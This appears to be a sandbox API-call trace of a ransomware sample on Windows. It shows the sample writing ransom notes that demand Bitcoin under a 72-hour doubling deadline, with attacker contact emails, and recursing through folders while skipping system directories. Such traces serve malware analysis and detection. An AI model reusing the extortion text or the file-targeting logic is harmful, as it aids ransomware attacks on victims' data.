	[0178.787] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.787] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.787] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0178.793] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.793] CreateFileW (lpFileName="C:\\Users\\All Users\\Templates\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\templates\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.793] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.794] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.794] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0178.794] CloseHandle (hObject=0x380) returned 1
	[0178.794] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.794] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.795] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.795] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\Templates\\HELP_DECRYPT_YOUR_FILES.HTML") returned 57
	[0178.795] CreateFileW (lpFileName="C:\\Users\\All Users\\Templates\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\templates\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.795] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.796] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0178.806] CloseHandle (hObject=0x380) returned 1
	[0178.806] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.806] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.807] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.807] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0178.808] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.808] CreateFileW (lpFileName="C:\\Users\\All Users\\Templates\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\templates\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.808] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.808] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.809] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0178.809] CloseHandle (hObject=0x380) returned 1
	[0178.809] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Templates\\*.*" (normalized: "c:\\users\\all users\\templates\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc06c451e, ftCreationTime.dwHighDateTime=0x1d7006b, ftLastAccessTime.dwLowDateTime=0xc06c451e, ftLastAccessTime.dwHighDateTime=0x1d7006b, ftLastWriteTime.dwLowDateTime=0xc06c451e, ftLastWriteTime.dwHighDateTime=0x1d7006b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PostRebootEventCache.V2", cAlternateFileName="POSTRE~1.V2")) returned 0xffffffff
	[0178.809] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0
	[0178.809] FindNextFileW (in: hFindFile=0xfb97b0, lpFindFileData=0x18d5c4 | out: lpFindFileData=0x18d5c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf99491c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf99491c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOPrivate", cAlternateFileName="USOPRI~1")) returned 1
	[0178.809] lstrcmpW (lpString1="USOPrivate", lpString2="..") returned 1
	[0178.809] lstrcmpW (lpString1="USOPrivate", lpString2=".") returned 1
	[0178.810] lstrcpyW (in: lpString1=0x18cfac, lpString2="C:\\Users\\All Users" | out: lpString1="C:\\Users\\All Users") returned="C:\\Users\\All Users"
	[0178.810] lstrcatW (in: lpString1="C:\\Users\\All Users", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\") returned="C:\\Users\\All Users\\"
	[0178.810] lstrcatW (in: lpString1="C:\\Users\\All Users\\", lpString2="USOPrivate" | out: lpString1="C:\\Users\\All Users\\USOPrivate") returned="C:\\Users\\All Users\\USOPrivate"
	[0178.810] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\USOPrivate" | out: lpString1="C:\\Users\\All Users\\USOPrivate") returned="C:\\Users\\All Users\\USOPrivate"
	[0178.810] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOPrivate", lpString2="\\" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\") returned="C:\\Users\\All Users\\USOPrivate\\"
	[0178.810] lstrcpyW (in: lpString1=0x18c094, lpString2="C:\\Users\\All Users\\USOPrivate\\" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\") returned="C:\\Users\\All Users\\USOPrivate\\"
	[0178.810] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOPrivate\\", lpString2="*.*" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\*.*") returned="C:\\Users\\All Users\\USOPrivate\\*.*"
	[0178.810] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\USOPrivate\\*.*" (normalized: "c:\\users\\all users\\usoprivate\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf99491c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf99491c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0178.811] lstrlenW (lpString="C:\\Users\\All Users\\USOPrivate\\*.*") returned 33
	[0178.811] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.811] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOPrivate\\*.*", cchLength=0x21 | out: lpsz="c:\\users\\all users\\usoprivate\\*.*") returned 0x21
	[0178.811] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.811] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="windows") returned 0x0
	[0178.812] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.812] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="boot") returned 0x0
	[0178.812] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.812] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="system volume information") returned 0x0
	[0178.812] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.812] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.812] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.813] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="temp") returned 0x0
	[0178.813] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.813] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="program files") returned 0x0
	[0178.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.814] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.814] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="appdata") returned 0x0
	[0178.814] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.815] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="application data") returned 0x0
	[0178.815] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.815] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="winnt") returned 0x0
	[0178.815] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.815] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="tmp") returned 0x0
	[0178.815] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.815] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="cache") returned 0x0
	[0178.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.816] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="temporary internet files") returned 0x0
	[0178.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.816] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="webcache") returned 0x0
	[0178.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.816] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="inetcache") returned 0x0
	[0178.816] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.816] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="nvidia") returned 0x0
	[0178.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.817] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="packages") returned 0x0
	[0178.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.817] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="cookies") returned 0x0
	[0178.817] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.817] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="programdata") returned 0x0
	[0178.817] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf99491c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf99491c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0178.817] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x745891c9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x745891c9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateStore", cAlternateFileName="UPDATE~1")) returned 1
	[0178.818] FindNextFileW (in: hFindFile=0xfb9b30, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x745891c9, ftLastAccessTime.dwHighDateTime=0x1d97afb, ftLastWriteTime.dwLowDateTime=0x745891c9, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UpdateStore", cAlternateFileName="UPDATE~1")) returned 0
	[0178.818] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 1
	[0178.818] FindClose (in: hFindFile=0xfb9b30 | out: hFindFile=0xfb9b30) returned 0
	[0178.818] lstrcpyW (in: lpString1=0x18c4a4, lpString2="C:\\Users\\All Users\\USOPrivate" | out: lpString1="C:\\Users\\All Users\\USOPrivate") returned="C:\\Users\\All Users\\USOPrivate"
	[0178.818] lstrcatW (in: lpString1="C:\\Users\\All Users\\USOPrivate", lpString2="\\*.*" | out: lpString1="C:\\Users\\All Users\\USOPrivate\\*.*") returned="C:\\Users\\All Users\\USOPrivate\\*.*"
	[0178.818] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.819] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.819] wsprintfW (in: param_1=0x18bd90, param_2="%s\\HELP_DECRYPT_YOUR_FILES.TXT" | out: param_1="C:\\Users\\All Users\\USOPrivate\\HELP_DECRYPT_YOUR_FILES.TXT") returned 57
	[0178.819] CreateFileW (lpFileName="C:\\Users\\All Users\\USOPrivate\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\usoprivate\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.821] lstrlenW (lpString="NOT YOUR LANGUAGE? USE https://translate.google.com\r\n\r\nWhat happened to your files ?\r\nAll of your files were protected by a strong encryption with RSA-2048.\r\nMore information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)\r\n\r\nHow did this happen ?\r\n!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.\r\n!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.\r\n!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server \r\n\r\nWhat do I do ?\r\nSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.\r\nIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.\r\n\r\nFor more specific instructions:\r\nContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. \r\nFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. \r\n\r\nPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price!\r\n\r\nE-MAIL1: enc2@usa.com\r\nE-MAIL2: enc2@dr.com\r\n\r\n") returned 1571
	[0178.821] WriteFile (in: hFile=0x380, lpBuffer=0x18b148*, nNumberOfBytesToWrite=0xc46, lpNumberOfBytesWritten=0x18c06c, lpOverlapped=0x0 | out: lpBuffer=0x18b148*, lpNumberOfBytesWritten=0x18c06c*=0xc46, lpOverlapped=0x0) returned 1
	[0178.824] CloseHandle (hObject=0x380) returned 1
	[0178.824] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b118, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b118*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.824] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.824] GetUserNameA (in: lpBuffer=0x18affc, pcbBuffer=0x18b114 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b114) returned 1
	[0178.825] wsprintfW (in: param_1=0x18bf98, param_2="YOUR_ID: %x%x" | out: param_1="YOUR_ID: c287f3826d6e218") returned 24
	[0178.825] CreateFileW (lpFileName="C:\\Users\\All Users\\USOPrivate\\HELP_DECRYPT_YOUR_FILES.TXT" (normalized: "c:\\users\\all users\\usoprivate\\help_decrypt_your_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.826] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xc46
	[0178.826] lstrlenW (lpString="YOUR_ID: c287f3826d6e218") returned 24
	[0178.826] WriteFile (in: hFile=0x380, lpBuffer=0x18bf98*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x18c074, lpOverlapped=0x0 | out: lpBuffer=0x18bf98*, lpNumberOfBytesWritten=0x18c074*=0x30, lpOverlapped=0x0) returned 1
	[0178.826] CloseHandle (hObject=0x380) returned 1
	[0178.826] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0178.827] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0178.827] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfA") returned 0x769804a0
	[0178.827] wsprintfW (in: param_1=0x18bd50, param_2="%s\\HELP_DECRYPT_YOUR_FILES.HTML" | out: param_1="C:\\Users\\All Users\\USOPrivate\\HELP_DECRYPT_YOUR_FILES.HTML") returned 58
	[0178.827] CreateFileW (lpFileName="C:\\Users\\All Users\\USOPrivate\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\usoprivate\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.835] lstrlenA (lpString="<!DOCTYPE html>\n\r<html>\n\r<head>\n\r<meta charset=\"utf-8\">\n\r<title>HELP_DECRYPT_YOUR_FILES</title>\n\r<style>\n\r.text {\n\r text-align:  center;\n\r}\n\r</style>\n\r</head>\n\r<body>\n\r<div class=\"text\">\n\r<strong>NOT YOUR LANGUAGE?</strong> USE <a href=\"https://translate.google.com\">https://translate.google.com</a><br><br>\n\r<strong>What happened to your files ?</strong><br>\n\rAll of your files were protected by a strong encryption with RSA-2048.<br>\n\rMore information about the encryption keys using RSA-2048 can be found here: <a href=\"http://en.wikipedia.org/wiki/RSA_(cryptosystem)\">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br><br>\n\r<strong>How did this happen ?</strong><br>\n\r!!! Specially for your PC was generated personal RSA-2048 KEY, both public and private.<br>\n\r!!! ALL YOUR FILES were encrypted with the public key, which has been transferred to your computer via the Internet.<br>\n\r!!! Decrypting of your files is only possible with the help of the private key and decrypt program , which is on our Secret Server <br><br>\n\r<strong>What do I do ?</strong><br>\n\rSo, there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way.<br>\n\rIf You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment.<br><br>\n\r<strong>For more specific instructions:</strong><br>\n\rContact us by email only, send us an email along with your ID number and wait for further instructions. Our specialist will contact you within 12 hours. <br>\n\rFor you to be sure, that we can decrypt your files - you can send us a single encrypted file and we will send you back it in a decrypted form. This will be your guarantee. <br>\n\r\n\rPlease do not waste your time! You have 72 hours only! After that The Main Server will double your price!\r\nSo right now You have a chance to buy your individual private HardWare with a low price! <br>\r\n<strong>E-MAIL1:</strong>\x09enc2@usa.com<br>\n\r<strong>E-MAIL2:</strong>\x09enc2@dr.com<br>\n\r") returned 2056
	[0178.835] WriteFile (in: hFile=0x380, lpBuffer=0x18b544*, nNumberOfBytesToWrite=0x808, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0x18b544*, lpNumberOfBytesWritten=0x18c068*=0x808, lpOverlapped=0x0) returned 1
	[0178.837] CloseHandle (hObject=0x380) returned 1
	[0178.837] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0178.838] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18b52c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18b52c*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0178.838] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0178.838] GetUserNameA (in: lpBuffer=0x18b410, pcbBuffer=0x18b528 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18b528) returned 1
	[0178.839] wsprintfA (in: param_1=0x18bf58, param_2="<strong>YOUR_ID: %x%x</strong>\r\n</div>\r\n</body>\x09\n</html>" | out: param_1="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.839] CreateFileW (lpFileName="C:\\Users\\All Users\\USOPrivate\\HELP_DECRYPT_YOUR_FILES.HTML" (normalized: "c:\\users\\all users\\usoprivate\\help_decrypt_your_files.html"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x380
	[0178.840] SetFilePointer (in: hFile=0x380, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x808
	[0178.840] lstrlenA (lpString="<strong>YOUR_ID: c287f3826d6e218</strong>\r\n</div>\r\n</body>\x09\n</html>") returned 67
	[0178.840] WriteFile (in: hFile=0x380, lpBuffer=0x18bf58*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x18c070, lpOverlapped=0x0 | out: lpBuffer=0x18bf58*, lpNumberOfBytesWritten=0x18c070*=0x43, lpOverlapped=0x0) returned 1
	[0178.840] CloseHandle (hObject=0x380) returned 1
	[0178.840] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\USOPrivate\\*.*" (normalized: "c:\\users\\all users\\usoprivate\\*.*"), lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf99491c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0x841feb26, ftLastWriteTime.dwHighDateTime=0x1d97afb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xfb9b30
	[0178.841] lstrlenW (lpString="C:\\Users\\All Users\\USOPrivate\\*.*") returned 33
	[0178.841] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0178.841] CharLowerBuffW (in: lpsz="C:\\Users\\All Users\\USOPrivate\\*.*", cchLength=0x21 | out: lpsz="c:\\users\\all users\\usoprivate\\*.*") returned 0x21
	[0178.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.841] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="windows") returned 0x0
	[0178.841] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.842] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="boot") returned 0x0
	[0178.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.842] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="system volume information") returned 0x0
	[0178.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.842] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="$recycle.bin") returned 0x0
	[0178.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.842] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="temp") returned 0x0
	[0178.842] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.843] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="program files") returned 0x0
	[0178.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.843] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="program files (x86)") returned 0x0
	[0178.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0178.843] StrStrW (lpFirst="c:\\users\\all users\\usoprivate\\*.*", lpSrch="appdata") returned 0x0
	[0178.843] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
